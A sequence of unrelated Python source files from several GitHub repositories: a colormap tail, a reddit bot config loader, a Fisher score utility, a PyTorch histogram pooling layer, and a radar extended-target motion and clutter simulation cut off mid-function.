[0.04153529411764706, 0.16146470588235293, 0.26464117647058827],
[0.043460784313725485, 0.16465921568627453, 0.27056431372549017],
[0.04548705882352941, 0.16778980392156864, 0.2764874509803922],
[0.047595294117647055, 0.1710023529411765, 0.28239176470588234],
[0.049722745098039214, 0.1742149019607843, 0.28821450980392155],
[0.05195098039215686, 0.17740784313725488, 0.2940372549019608],
[0.05428, 0.18052, 0.29985999999999996],
[0.05670980392156863, 0.1835913725490196, 0.3056827450980392],
[0.059261176470588234, 0.1865027450980392, 0.3115262745098039],
[0.061992941176470584, 0.18937176470588235, 0.3174494117647059],
[0.06482549019607843, 0.19208235294117648, 0.3233725490196078],
[0.06778078431372549, 0.19479294117647059, 0.3292956862745098],
[0.07091529411764706, 0.19745882352941174, 0.33519647058823526],
[0.07419607843137256, 0.19994588235294117, 0.341064705882353],
[0.07775607843137256, 0.20228588235294118, 0.34706509803921565],
[0.08154117647058823, 0.2043705882352941, 0.35301176470588236],
[0.08562862745098039, 0.20630666666666667, 0.35903529411764706],
[0.09004274509803921, 0.20791607843137255, 0.36505882352941177],
[0.09490941176470588, 0.20909764705882353, 0.3711317647058823],
[0.10045607843137254, 0.20972509803921568, 0.3773560784313726],
[0.1068843137254902, 0.20980000000000001, 0.3835294117647059],
[0.11404117647058824, 0.20977411764705883, 0.3894494117647059],
[0.12172823529411765, 0.20967372549019608, 0.39501882352941176],
[0.12996666666666667, 0.20954666666666666, 0.40036000000000005],
[0.13860823529411764, 0.20931882352941178, 0.40539882352941176],
[0.14768039215686274, 0.20899019607843136, 0.4101352941176471],
[0.15720078431372547, 0.2085886274509804, 0.4145972549019608],
[0.1670235294117647, 0.20815882352941176, 0.4188294117647059],
[0.17712, 0.20765686274509804, 0.4227878431372549],
[0.1874470588235294, 0.2071258823529412, 0.4264866666666666],
[0.1980764705882353, 0.20649411764705883, 0.4298411764705882],
[0.20900823529411766, 0.20576156862745099, 0.4329643137254902],
[0.2202121568627451, 0.20492823529411766, 0.4358152941176471],
[0.2315870588235294, 0.20399411764705883, 0.43843411764705886],
[0.2430937254901961, 0.20295921568627454, 0.440781568627451],
[0.2547392156862745, 0.2018235294117647, 0.44292745098039216],
[0.26638470588235297, 0.20061882352941177, 0.4449035294117647],
[0.2780945098039216, 0.19934980392156865, 0.4467145098039216],
[0.2899407843137255, 0.1979443137254902, 0.44828823529411765],
[0.30182000000000003, 0.1965058823529412, 0.4496952941176471],
[0.31376666666666664, 0.19493333333333332, 0.4508666666666667],
[0.3257470588235294, 0.1931929411764706, 0.4519035294117647],
[0.33779411764705886, 0.19135176470588236, 0.4527729411764706],
[0.3498756862745098, 0.18940980392156864, 0.45350705882352943],
[0.36198823529411767, 0.1873321568627451, 0.45407450980392156],
[0.3740352941176471, 0.1851235294117647, 0.4545411764705882],
[0.3860466666666667, 0.1828435294117647, 0.4549070588235294],
[0.3979572549019608, 0.18039803921568628, 0.4551721568627451],
[0.4098035294117647, 0.17788823529411765, 0.45537294117647054],
[0.42161294117647063, 0.17537843137254902, 0.455536862745098],
[0.4332843137254902, 0.17283137254901962, 0.4556],
[0.44479176470588233, 0.17025882352941174, 0.4556],
[0.45619843137254906, 0.1677870588235294, 0.4555619607843137],
[0.4675043137254902, 0.16537764705882355, 0.455461568627451],
[0.4787094117647059, 0.16296823529411764, 0.4553223529411765],
[0.4898137254901961, 0.16055882352941178, 0.45512156862745096],
[0.5007776470588235, 0.15810980392156862, 0.4549207843137255],
[0.51162, 0.15564, 0.45471999999999996],
[0.5224219607843137, 0.15323058823529412, 0.45447882352941177],
[0.533123137254902, 0.15082117647058824, 0.4541776470588235],
[0.5437235294117647, 0.14841176470588235, 0.45383529411764706],
[0.554264705882353, 0.14600235294117647, 0.4534337254901961],
[0.5647639215686275, 0.1435929411764706, 0.4530321568627451],
[0.5751623529411765, 0.14122588235294117, 0.4525882352941176],
[0.5854600000000001, 0.13891686274509804, 0.45208627450980393],
[0.5957, 0.1366078431372549, 0.4515843137254902],
[0.6058529411764706, 0.13429882352941178, 0.45108235294117643],
[0.6158921568627451, 0.13198980392156864, 0.45062431372549017],
[0.6258870588235295, 0.1296807843137255, 0.45017843137254904],
[0.6357811764705883, 0.12737176470588235, 0.44972117647058824],
[0.6455745098039215, 0.1251078431372549, 0.4492745098039216],
[0.6553125490196079, 0.12294470588235294, 0.44877254901960784],
[0.6650047058823529, 0.12088235294117647, 0.4482705882352941],
[0.6745960784313725, 0.11896705882352941, 0.4477686274509804],
[0.6840866666666667, 0.11716, 0.44722],
[0.6935235294117648, 0.1154, 0.44666470588235296],
[0.7029129411764705, 0.1137407843137255, 0.44611529411764705],
[0.7122494117647059, 0.11223019607843138, 0.4455129411764706],
[0.7215376470588235, 0.11092117647058823, 0.4449105882352941],
[0.7307250980392157, 0.10976509803921569, 0.4442596078431372],
[0.7399098039215686, 0.10875882352941177, 0.4435078431372549],
[0.7490964705882353, 0.10795411764705883, 0.44265529411764704],
[0.7582819607843136, 0.10745058823529412, 0.4416521568627451],
[0.7675180392156862, 0.10830392156862745, 0.44009607843137255],
[0.7767035294117648, 0.11127294117647059, 0.4377847058823529],
[0.7858901960784314, 0.11585098039215687, 0.43491960784313727],
[0.7950235294117647, 0.12173921568627452, 0.43149921568627453],
[0.8040070588235294, 0.12862705882352943, 0.42768117647058823],
[0.8129419607843137, 0.13637686274509803, 0.4235572549019608],
[0.8217192156862745, 0.14518705882352942, 0.4189776470588235],
[0.8302999999999999, 0.15489411764705882, 0.41405294117647057],
[0.8386733333333334, 0.16509333333333331, 0.4089266666666667],
[0.8468517647058824, 0.17570235294117648, 0.40359882352941173],
[0.8548211764705882, 0.1869235294117647, 0.398015294117647],
[0.8625427450980392, 0.19885019607843138, 0.39212941176470584],
[0.8699529411764706, 0.2115372549019608, 0.3858862745098039],
[0.877070588235294, 0.22486470588235294, 0.3793505882352941],
[0.8839309803921569, 0.23864039215686272, 0.37255764705882355],
[0.8904890196078432, 0.2527070588235294, 0.365518431372549],
[0.8968011764705882, 0.26680588235294117, 0.3583905882352941],
[0.9029117647058824, 0.28091764705882355, 0.3512058823529412],
[0.9087635294117647, 0.2951874509803922, 0.343863137254902],
[0.9143129411764706, 0.30965882352941176, 0.3363764705882353],
[0.9195599999999999, 0.324389803921569, 0.32867294117647056],
[0.924504705882353, 0.3394231372549019, 0.32078392156862745],
[0.9291470588235294, 0.35469999999999996, 0.31273529411764706],
[0.9334278431372549, 0.370178431372549, 0.3044850980392157],
[0.9373650980392156, 0.38591803921568624, 0.29597372549019607],
[0.9410000000000001, 0.4019, 0.28728],
[0.9443325490196078, 0.4179627450980392, 0.2784250980392157],
[0.9474235294117647, 0.4340862745098039, 0.26942941176470586],
[0.9502517647058824, 0.45024941176470584, 0.2602717647058823],
[0.9527776470588235, 0.46635098039215683, 0.2510356862745098],
[0.955063137254902, 0.48235176470588237, 0.24173764705882353],
[0.9572094117647059, 0.49818941176470594, 0.23240117647058825],
[0.9591921568627451, 0.5137627450980392, 0.22300196078431372],
[0.9610364705882353, 0.529096862745098, 0.2135650980392157],
[0.9627164705882354, 0.544229411764706, 0.20412823529411767],
[0.9642588235294117, 0.5592243137254902, 0.19475529411764705],
[0.9656360784313726, 0.5739898039215686, 0.18541882352941175],
[0.9668764705882353, 0.5885823529411766, 0.1760823529411765],
[0.9679509803921568, 0.6030090196078431, 0.16681098039215686],
[0.9688894117647059, 0.6172341176470588, 0.15764039215686276],
[0.9697270588235294, 0.6312576470588235, 0.1486364705882353],
[0.9704639215686275, 0.6450796078431372, 0.1397678431372549],
[0.9710333333333333, 0.6587000000000001, 0.131],
[0.971535294117647, 0.6720517647058823, 0.1224],
[0.9720372549019607, 0.6851686274509804, 0.11393411764705882],
[0.9724713725490196, 0.6980839215686275, 0.10563686274509804],
[0.9728729411764706, 0.7107294117647058, 0.09747294117647058],
[0.9732745098039216, 0.7231411764705883, 0.08940980392156862],
[0.9736760784313725, 0.7353513725490196, 0.08130941176470588],
[0.9741470588235294, 0.7472905882352942, 0.07324705882352942],
[0.9745792156862745, 0.7589274509803922, 0.06535529411764707],
[0.9749807843137255, 0.7704023529411764, 0.057805490196078425],
[0.9753823529411765, 0.7816352941176471, 0.05065882352941176],
[0.9757839215686275, 0.792636862745098, 0.04391529411764706],
[0.976256862745098, 0.803436862745098, 0.03757490196078427],
[0.9767588235294118, 0.8140352941176471, 0.03156588235294118],
[0.9773329411764705, 0.8243600000000001, 0.02571490196078431],
[0.9780078431372549, 0.8344549019607843, 0.020254901960784354],
[0.9787105882352941, 0.8443482352941176, 0.015371764705882392],
[0.9794866666666667, 0.8541133333333334, 0.011093333333333372],
[0.9803635294117647, 0.8636301960784313, 0.007272156862745059],
[0.9812670588235294, 0.8729929411764706, 0.004076470588235255],
[0.9822450980392157, 0.8822549019607843, 0.0016607843137254822],
[0.9832490196078432, 0.8914160784313726, 0.0002760784313725482],
[0.9841776470588236, 0.9006270588235293, 0.0024094117647058743],
[0.9850811764705882, 0.9097874509803922, 0.008119607843137215],
[0.9859847058823529, 0.9186949019607843, 0.01624274509803914],
[0.9869647058823529, 0.9273, 0.026558823529411607],
[0.9879686274509804, 0.9354490196078431, 0.03824666666666679],
[0.9889725490196078, 0.9432486274509804, 0.05142941176470588],
[0.9899764705882352, 0.9506682352941177, 0.06630235294117647],
[0.9909023529411765, 0.9576066666666666, 0.08242039215686274],
[0.9917274509803922, 0.9642764705882353, 0.0987843137254902],
[0.9925305882352942, 0.9705082352941177, 0.1157],
[0.9934129411764706, 0.9761568627450979, 0.13355882352941176],
[0.994236862745098, 0.9812007843137255, 0.15242549019607804],
[0.99496, 0.9857199999999999, 0.17238000000000037],
[0.9956627450980392, 0.9894941176470589, 0.19328235294117646],
[0.9963654901960785, 0.9925427450980392, 0.21509176470588234],
[0.9971494117647058, 0.9948047058823529, 0.23780823529411765],
[0.9979525490196078, 0.9961788235294118, 0.26159490196078433],
[0.9985917647058823, 0.9968917647058824, 0.28608039215686276],
[0.9988647058823529, 0.9972470588235294, 0.31084117647058784],
[0.9989, 0.9973, 0.33563803921568586],
[0.9986505882352942, 0.997050588235294, 0.36035176470588276],
[0.9981823529411764, 0.9966658823529412, 0.3845470588235298],
[0.9975964705882353, 0.9962643137254903, 0.4080537254901961],
[0.9971627450980393, 0.9958627450980392, 0.43034901960784316],
[0.9970152941176471, 0.9958, 0.45057176470588234],
[0.9970850980392156, 0.9959701960784313, 0.46942823529411765],
[0.9971854901960784, 0.9961709803921568, 0.4875027450980392],
[0.9972858823529411, 0.9964576470588236, 0.5049576470588235],
[0.9974725490196079, 0.9967588235294117, 0.5220666666666667],
[0.9975866666666667, 0.9969733333333333, 0.5387866666666666],
[0.9977741176470588, 0.9972611764705883, 0.5551035294117647],
[0.9978874509803921, 0.9974749019607843, 0.5712796078431372],
[0.9978999999999999, 0.9975878431372549, 0.5874427450980392],
[0.9978999999999999, 0.9976, 0.6034294117647059],
[0.9978999999999999, 0.9976886274509803, 0.6192145098039216],
[0.9978999999999999, 0.9977, 0.6347090196078431],
[0.9978999999999999, 0.9977894117647058, 0.6499011764705882],
[0.9978999999999999, 0.9978, 0.6648807843137255],
[0.9979901960784314, 0.9978901960784313, 0.6796588235294118],
[0.998, 0.9978999999999999, 0.694144705882353],
[0.9980909803921569, 0.9979909803921568, 0.7083282352941177],
[0.9981913725490197, 0.9981827450980392, 0.7223007843137255],
[0.9982917647058823, 0.9982917647058823, 0.7360717647058823],
[0.9984843137254902, 0.9984843137254902, 0.7496411764705883],
[0.9986850980392157, 0.9986850980392157, 0.7630090196078431],
[0.9987929411764707, 0.9987929411764707, 0.7762682352941176],
[0.9989866666666667, 0.9988933333333334, 0.7894266666666666],
[0.999093725490196, 0.9989937254901962, 0.8025780392156863],
[0.9991941176470588, 0.9990941176470588, 0.8157294117647058],
[0.9992, 0.9991, 0.8287862745098039],
[0.9992, 0.9991, 0.8417423529411764],
[0.9992, 0.9991, 0.8546929411764705],
[0.9992, 0.9991, 0.8674521568627451],
[0.9992, 0.9991, 0.8801058823529412],
[0.9992, 0.9991, 0.8926588235294117],
[0.9992, 0.999196862745098, 0.9050141176470589],
[0.9992972549019608, 0.9992972549019608, 0.9172650980392157],
[0.9993, 0.9993, 0.9294152941176471],
[0.9993980392156863, 0.9993980392156863, 0.9414647058823529],
[0.999498431372549, 0.999498431372549, 0.9534133333333333],
[0.9995988235294118, 0.9995988235294118, 0.9651623529411765],
[0.9996992156862745, 0.9996992156862745, 0.9769082352941176],
[0.9997996078431373, 0.9997996078431373, 0.9885545098039216],
[1.0, 1.0, 1.0]]
morgen_colors_r = morgen_colors[::-1]
morgenstemning_cmap = mpl.colors.ListedColormap(morgen_colors, 'morgenstemning')
morgenstemning_r_cmap = mpl.colors.ListedColormap(morgen_colors_r,'inv_morgenstemning')
``` |
{
"source": "joeYeager/reddit-quote-bot",
"score": 3
} |
#### File: reddit-quote-bot/src/config.py
```python
import json
class Config:
def __init__(self,config_file):
with open(config_file) as config_json:
config = json.load(config_json)
self.owner_name = config.get("owner_name", None)
self.version = config.get("version", None)
self.bot_name = config.get("bot_name", None)
self.password = config.get("bot_pass", None)
# A short description of what the bot does
self.description = config.get("description", None)
# The word you would like to cause the bot to trigger
self.summon_word = config.get("summon_word", None)
# Relative file path to the logfile
self.log_file = config.get("log_file", None)
# Relative file path to the quote file
self.quote_file = config.get("quote_file", None)
# Comma sepearted list of the subreddits for the bot to operate in
self.subreddits = config.get("subreddits", None)
# How mant comments would you like the bot to stream at a time
self.comment_limit = config.get("comment_limit", None)
# Header string
self.header = config.get("header", None)
# Database settings
db = config.get("db", None)
self.db_host = db.get("host", None)
self.db_user = db.get("username", None)
self.db_pw = db.get("password", None)
self.db_name = db.get("database", None)
self.db_table = db.get("table", None)
# The user agent string to be provided to reddit upon establishing a connection
self.user_agent = "{} by u/{} v{} {}".format(self.bot_name, self.owner_name, self.version, self.description)
``` |
{
"source": "joeyee/Histogram_Layer",
"score": 3
} |
#### File: Histogram_Layer/Utils/Compute_FDR.py
```python
import numpy as np
def Compute_Fisher_Score(features,labels):
#Get index of labels that correspond to each class
Classes = np.unique(labels)
#Get number of instances of each class for P_i
Instances = np.zeros(len(Classes))
for i in range(0,len(Classes)):
Instances[i] = sum(labels==Classes[i])
P_i = Instances/sum(Instances);
#Compute global mean
global_mean = np.mean(features,axis=0)
#For each class compute intra and inter class variations
scores = np.zeros(len(Classes))
log_scores = np.zeros(len(Classes))
for current_class in range(0,len(Classes)):
data = features[labels==Classes[current_class],:]
#Within-class scatter matrix
S_w = P_i[i]*np.cov(data.T)
#Between-class scatter matrix
S_b = P_i[i]*(np.outer((np.mean(data,axis=0)-global_mean),
(np.mean(data,axis=0)-global_mean).T))
#Compute the score, compute abs of score, only care about magnitude
#compute log of scores if too large
#Using pseudoinverse if singular matrix
try:
scores[current_class] = abs((np.matmul(np.linalg.inv(S_w),S_b)).trace())
except:
scores[current_class] = abs((np.matmul(np.linalg.pinv(S_w),S_b)).trace())
log_scores[current_class] = np.log(scores[current_class])
return scores, log_scores
```
#### File: Histogram_Layer/Utils/LinearHistogramPooling.py
```python
import torch
import torch.nn as nn
import torch.nn.functional as F
import numpy as np
import pdb
class HistogramLayer(nn.Module):
def __init__(self,in_channels,kernel_size,dim=2,num_bins=4,
stride=1,padding=0,normalize_count=True,normalize_bins = True,
count_include_pad=False,
ceil_mode=False):
# inherit nn.module
super(HistogramLayer, self).__init__()
# define layer properties
# histogram bin data
self.in_channels = in_channels
self.numBins = num_bins
self.stride = stride
self.kernel_size = kernel_size
self.dim = dim
self.padding = padding
self.normalize_count = normalize_count
self.normalize_bins = normalize_bins
self.count_include_pad = count_include_pad
self.ceil_mode = ceil_mode
#For each data type, apply two 1x1 convolutions, 1) to learn bin center (bias)
# and 2) to learn bin width
# Time series/ signal Data
if self.dim == 1:
self.bin_centers_conv = nn.Conv1d(self.in_channels,self.numBins*self.in_channels,1,
groups=self.in_channels,bias=True)
self.bin_centers_conv.weight.data.fill_(1)
self.bin_centers_conv.weight.requires_grad = False
self.bin_widths_conv = nn.Conv1d(self.numBins*self.in_channels,
self.numBins*self.in_channels,1,
groups=self.numBins*self.in_channels,
bias=True)
self.bin_widths_conv.bias.data.fill_(1)
self.bin_widths_conv.bias.requires_grad = False
self.hist_pool = nn.AvgPool1d(self.filt_dim,stride=self.stride,
padding=self.padding,ceil_mode=self.ceil_mode,
count_include_pad=self.count_include_pad)
self.centers = self.bin_centers_conv.bias
self.widths = self.bin_widths_conv.weight
# Image Data
elif self.dim == 2:
self.bin_centers_conv = nn.Conv2d(self.in_channels,self.numBins*self.in_channels,1,
groups=self.in_channels,bias=True)
self.bin_centers_conv.weight.data.fill_(1)
self.bin_centers_conv.weight.requires_grad = False
self.bin_widths_conv = nn.Conv2d(self.numBins*self.in_channels,
self.numBins*self.in_channels,1,
groups=self.numBins*self.in_channels,
bias=True)
self.bin_widths_conv.bias.data.fill_(1)
self.bin_widths_conv.bias.requires_grad = False
self.hist_pool = nn.AvgPool2d(self.kernel_size,stride=self.stride,
padding=self.padding,ceil_mode=self.ceil_mode,
count_include_pad=self.count_include_pad)
self.centers = self.bin_centers_conv.bias
self.widths = self.bin_widths_conv.weight
# Spatial/Temporal or Volumetric Data
elif self.dim == 3:
self.bin_centers_conv = nn.Conv3d(self.in_channels,self.numBins*self.in_channels,1,
groups=self.in_channels,bias=True)
self.bin_centers_conv.weight.data.fill_(1)
self.bin_centers_conv.weight.requires_grad = False
self.bin_widths_conv = nn.Conv3d(self.numBins*self.in_channels,
self.numBins*self.in_channels,1,
groups=self.numBins*self.in_channels,
bias=True)
self.bin_widths_conv.bias.data.fill_(1)
self.bin_widths_conv.bias.requires_grad = False
self.hist_pool = nn.AvgPool3d(self.filt_dim,stride=self.stride,
padding=self.padding,ceil_mode=self.ceil_mode,
count_include_pad=self.count_include_pad)
self.centers = self.bin_centers_conv.bias
self.widths = self.bin_widths_conv.weight
else:
raise RuntimeError('Invalid dimension for histogram layer')
def forward(self,xx):
## xx is the input and is a torch.tensor
##each element of output is the frequency for the bin for that window
#Pass through first convolution to learn bin centers: |x-center|
xx = torch.abs(self.bin_centers_conv(xx))
#Pass through second convolution to learn bin widths 1-w*|x-center|
xx = self.bin_widths_conv(xx)
#Pass through relu
xx = F.relu(xx)
#Enforce sum to one constraint
# Add small positive constant in case sum is zero
if(self.normalize_bins):
xx = self.constrain_bins(xx)
#Get localized histogram output, if normalize, average count
if(self.normalize_count):
xx = self.hist_pool(xx)
else:
xx = np.prod(np.asarray(self.hist_pool.kernel_size))*self.hist_pool(xx)
return xx
def constrain_bins(self,xx):
#Enforce sum to one constraint across bins
# Time series/ signal Data
if self.dim == 1:
n,c,l = xx.size()
xx_sum = xx.reshape(n, c//self.numBins, self.numBins, l).sum(2) + torch.tensor(10e-6)
xx_sum = torch.repeat_interleave(xx_sum,self.numBins,dim=1)
xx = xx/xx_sum
# Image Data
elif self.dim == 2:
n,c,h,w = xx.size()
xx_sum = xx.reshape(n, c//self.numBins, self.numBins, h, w).sum(2) + torch.tensor(10e-6)
xx_sum = torch.repeat_interleave(xx_sum,self.numBins,dim=1)
xx = xx/xx_sum
# Spatial/Temporal or Volumetric Data
elif self.dim == 3:
n,c,d,h,w = xx.size()
xx_sum = xx.reshape(n, c//self.numBins, self.numBins,d, h, w).sum(2) + torch.tensor(10e-6)
xx_sum = torch.repeat_interleave(xx_sum,self.numBins,dim=1)
xx = xx/xx_sum
else:
raise RuntimeError('Invalid dimension for histogram layer')
return xx
``` |
{
"source": "joeyee/MKCF-TBD",
"score": 3
} |
#### File: joeyee/MKCF-TBD/motion_simulation.py
```python
import numpy as np
import matplotlib.pyplot as plt
from scipy.stats import norm,rayleigh
import numpy.linalg as la
from matplotlib.patches import Ellipse
from matplotlib.patches import Rectangle
import kalman_filter_20201029 as kf_model
import jpda_IJOE2016_20201029 as jpda_model
from scipy import ndimage
from scipy.stats import norm,rayleigh
from scipy.ndimage.interpolation import rotate
from scipy.stats import norm,rayleigh,chi,chi2
import utilities_200611 as uti # personal tools
def constant_velocity(x0, y0, velo, npoints):
'''
:param x0: start point's x
:param y0: start point's y
:param velo: constant velocity(vx,vy)
:param npoints: number of points
:return:
'''
ts = np.linspace(0, npoints-1, npoints)
vx,vy = velo
xs = x0 + vx*ts
ys = y0 + vy*ts
return xs, ys
def constant_accelerate(x0, y0, velo, acc, npoints):
'''
:param x0: start point's x
:param y0: start point's y
:param velo: initial velocity(vx,vy)
:param acc: constant accelerate
:param npoints: number of points
:return: trajectory of xs, ys
'''
ts = np.linspace(0, npoints-1, npoints)
vx,vy = velo
ax,ay = acc
xs = x0 + vx*ts + (ts**2)*ax/2
ys = y0 + vy*ts + (ts**2)*ay/2
return xs, ys
def constant_turn(x0, y0, radius, omega, npoints):
'''
:param x0: start point's x
:param y0: start point's y
:param radius: radius of turning
:param omega: constant turning rate
:return:trajectory
'''
ts = np.linspace(0, npoints-1, npoints)
xs = x0 + np.sin(omega*ts)*radius
ys = y0 + np.cos(omega*ts)*radius
return xs, ys
def get_orientation(xs,ys):
'''
Get velocity based on the locations,
Using the velocity to compute the orientation.
:param xs:
:param ys:
:return:
'''
dys = np.diff(ys)
dxs = np.diff(xs)
#compute the orientation of the extended target by velocity.
thetas_less = np.arctan2(dys, dxs) # len(dxs) - 1
thetas = np.pad(thetas_less, (0, 1), 'edge') # add one elements to the end
return thetas
def s_manuver():
'''
a S-type manuvering trajectory: including a cv, ca, cv and ct.
:return: trajectories
'''
x0 = 10
y0 = 30
#velo= (2*2, -1*2)
velo = (5 * 2, -1 * 2)
npoints = 10
x1s, y1s = constant_velocity(x0, y0, velo, npoints)
x0= x1s[-1]
y0= y1s[-1]
#velo = (1*2,1*2)
velo = (2 * 2, 4 * 2)
acc = (-0.25,1)
npoints = 8
x2s, y2s = constant_accelerate(x0, y0, velo, acc, npoints)
x0 = x2s[-1]
y0 = y2s[-1]
#velo = (1*2, 1*2)
velo = (5 * 2, 2 * 2)
npoints = 10
x3s, y3s = constant_velocity(x0, y0, velo, npoints)
radius = 30
omega = 0.3
npoints =12
x0 = x3s[-1]+4 - radius*np.sin(omega)
y0 = y3s[-1] - radius*np.cos(omega)
x4s,y4s = constant_turn(x0, y0, radius, omega, npoints)
xs = x1s.tolist() + x2s.tolist() + x3s.tolist() + x4s.tolist()
ys = y1s.tolist() + y2s.tolist() + y3s.tolist() + y4s.tolist()
fig, ax = plt.subplots()
w1t = 15
h1t = 9
npoints = len(xs)
ws = np.random.normal(w1t, 0.5, npoints)
hs = np.random.normal(h1t, 0.5, npoints)
dys = np.diff(ys)
dxs = np.diff(xs)
#compute the orientation of the extended target by velocity.
thetas_less = np.arctan2(dys, dxs) # len(dxs) - 1
thetas = np.pad(thetas_less, (0, 1), 'edge') # add one elements to the end
# # visualize the trajectory of the extended target
plot_ellipse(ax, xs, ys, ws, hs, facecolor='green')
plt.show()
#
# tx = [str(i) for i in range(1,len(xs)+1)]
# show_text(xs, ys, tx) #show text
# plot_trajectory(xs,ys,'green') #draw trajectory
return xs,ys,ws,hs,thetas
'''
# This is an example from the ndimage, to compute the Gaussian kernel.
def _gaussian_kernel1d(sigma, order, radius):
"""
Computes a 1D Gaussian convolution kernel.
"""
if order < 0:
raise ValueError('order must be non-negative')
p = numpy.polynomial.Polynomial([0, 0, -0.5 / (sigma * sigma)])
x = numpy.arange(-radius, radius + 1)
phi_x = numpy.exp(p(x), dtype=numpy.double)
phi_x /= phi_x.sum()
if order > 0:
q = numpy.polynomial.Polynomial([1])
p_deriv = p.deriv()
for _ in range(order):
# f(x) = q(x) * phi(x) = q(x) * exp(p(x))
# f'(x) = (q'(x) + q(x) * p'(x)) * phi(x)
q = q.deriv() + q * p_deriv
phi_x *= q(x)
return phi_x
'''
def gaussian_kernel2d(sigma_x, sigma_y, theta, bnorm=True):
'''
Return a 2d Gaussian kernel template (2d matrix).
:param sigma_x:
:param sigma_y:
:param theta: rotation theta of 2d Gaussian
:return: Gaussian Kernel Template.
'''
kernel_wr = np.int(sigma_x * 2.5 + 0.5)
kernel_hr = np.int(sigma_y * 2.5 + 0.5)
#if kernel_hr < 5 or kernel_wr < 5:
# raise ValueError('kenrel width or/and height are too small')
kx = np.arange(-kernel_wr, kernel_wr + 1)
ky = np.arange(-kernel_hr, kernel_hr + 1)
KX, KY = np.meshgrid(kx, ky)
theta = -1*theta
a = np.cos(theta) ** 2 / (2 * sigma_x ** 2) + np.sin(theta) ** 2 / (2 * sigma_y ** 2)
b = -np.sin(2 * theta) / (4 * sigma_x ** 2) + np.sin(2 * theta) / (4 * sigma_y ** 2)
c = np.sin(theta) ** 2 / (2 * sigma_x ** 2) + np.cos(theta) ** 2 / (2 * sigma_y ** 2)
# f(x,y)=Aexp(−(a(x−xo)2+2b(x−xo)(y−yo)+c(y−yo)2)) , here xo=0, yo=0
# f(x,y)=Aexp(−(ax^2+2bxy+cy^2))
# a = cos2θ2σ2X + sin2θ2σ2Y
# b =−sin2θ4σ2X + sin2θ4σ2Y
# c = sin2θ2σ2X + cos2θ2σ2Y
kgauss = np.exp(-(a * KX ** 2 + 2 * b * KX * KY + c * KY ** 2))
if bnorm:#normalization in default mode.
kgauss = kgauss / np.sum(kgauss)
return kgauss
local_snrs = []
global_snrs = []
#constant_template = gaussian_kernel2d(8,4,0)
dec_str = [12 , 11 , 10 , 9 , 8 , 7 , 6 , 5 , 4 , 3 , 2 , 1 , 0 , -1 , -2 ]
def add_gaussian_template_on_clutter(cx, cy, w, h, theta, erc, snr, clutter_background, swerling_type=0):
# Erc: average clutter energy.
# Erc = np.sum(clutter_background ** 2) / clutter_background.size
sigma_x = (w / 2.5 - 0.5) / 2 #sigma_x is related to the width of the template
sigma_y = (h / 2.5 - 0.5) / 2
kgauss = gaussian_kernel2d(sigma_x, sigma_y, theta) # Get diffusive coefficients for a 2d gaussian
# kh_big,kw_big = kgauss_big.shape[:2]
# kh,kw = [int(kh_big/2), int(kw_big/2)]
# kly,klx = [int(kh/2), int(kw/2)]
# kgauss = kgauss_big[kly:kly+kh, klx:klx+kw]
Egk_numer = np.sum(kgauss.ravel() ** 2) / kgauss.size # 2d gaussian's average power.
h_t, w_t = kgauss.shape
ly = int(cy - (h_t - 1) / 2)
ry = int(cy + (h_t - 1) / 2)
lx = int(cx - (w_t - 1) / 2)
rx = int(cx + (w_t - 1) / 2)
img_h, img_w = clutter_background.shape
if ly < 0 or lx < 0 or ry > img_h or rx > img_w:
raise ValueError('template location is beyond the image boundaries!')
bk_roi = clutter_background[ly:ly + h_t, lx:lx + w_t]
# compute the amplitude coefficients according to the SNR Eq.
kcoef_global = np.sqrt(np.power(10, (snr / 10)) * erc / Egk_numer)
# average power of clutter is computed by numerical results in local roi-window.
erc_local = np.sum(bk_roi ** 2) / bk_roi.size
kcoef_local = np.sqrt(np.power(10, (snr / 10)) * erc_local / Egk_numer)
kcoef = kcoef_global
if swerling_type == 0: # swerling type 0 target
kcoef_t = kcoef
template = kgauss * kcoef_t
if swerling_type == 1:
sigma = kcoef # /np.sqrt(2)
# central amplitude obeys the rayleigh distribution, which 2*sigma^2 = sigma_t = kcoef**2 (swerling_0's Amplitude)
kcoef_t = rayleigh.rvs(loc=0, scale=sigma, size=1)
template = kgauss * kcoef_t
if swerling_type == 3: # central amplitude obeys the chi distribution, which degrees of freedom k=4.
kcoef_t = chi2.rvs(df=kcoef, size=1) # or kcoef_t = chi2.rvs(df=kcoef, size=1), then template=kgauss*kcoef
template = kgauss * (kcoef_t) # for chi2, Mean=df.
# Get decrease_coeffient to make sure the inner gaussian template satisfy the snr requirement.
tcx, tcy = w_t/2, h_t/2
snr_lis= list(range(12, -3, -1)) # [12, 11, ..., -1, -2]
# shrink rate, take from cfar results.
snr_lis= [12 , 11 , 10 , 9 , 8 , 7 , 6 , 5 , 4 , 3 , 2 , 1 , 0 , -1 , -2 ]
wr_lis = [1.62, 1.67, 1.65, 1.76, 1.80, 2.00, 2.20, 2.30, 3.20, 3.50, 3.70, 3.90, 4.00, 4.2, 4.5]
hr_lis = [0.88, 0.89, 0.90, 0.92, 1.00, 1.10 ,1.20, 1.20, 1.55, 1.55, 1.65, 1.70, 1.75, 2.0, 2.5]
decs = [0.77, 0.76, 0.75, 0.74, 0.73, 0.66, 0.62, 0.61, 0.50, 0.48, 0.42, 0.38, 0.35, 0.28,0.25]
#decrease the size of Gaussian template, similar to the cfar_seg results.
# [cfar shrink the real target, when outside is lower than center]
wr = wr_lis[snr_lis.index(snr)]
hr = hr_lis[snr_lis.index(snr)]
iw, ih = w_t/wr, min(h_t/hr, h_t)
ix, iy, iw, ih = np.int0([tcx-iw/2, tcy-ih/2, iw, ih])
inner_gauss = template[iy:iy+ih, ix:ix+iw]
dec_coef = np.sqrt(np.power(10, (snr / 10)) * erc_local / np.mean(inner_gauss**2))
dec_str[snr_lis.index(snr)] = '%.2f'%dec_coef
dec_coef = decs[snr_lis.index(snr)]
template = template*dec_coef #np.sqrt(1.618) #/2.8 # Make sure that in shrinked (cfar-segmented) target region still holds low snr.
loc_snr = 10 * np.log10(np.sum(template ** 2) / np.sum(bk_roi ** 2))
glob_snr = 10 * np.log10(np.sum(template ** 2) / (erc * template.size))
# print('Swerling Type %d, kcoef_t %.2f (w %d, h %d), extened_egk %.2E' % (swerling_type, kcoef_t, w, h, Egk_numer))
# print('average (target - local clutter) power is (%.2f - %.2f)' % (np.sum(template ** 2) / template.size, erc_local))
# print('Asked snr is %d, simulated local snr is %.2f, simulated global snr is %.2f' % (snr, loc_snr, glob_snr))
#local_snrs.append(loc_snr)
#global_snrs.append(glob_snr)
mask = ([template > bk_roi]) * template
clutter_background[ly:ly + h_t, lx:lx + w_t] = mask + bk_roi
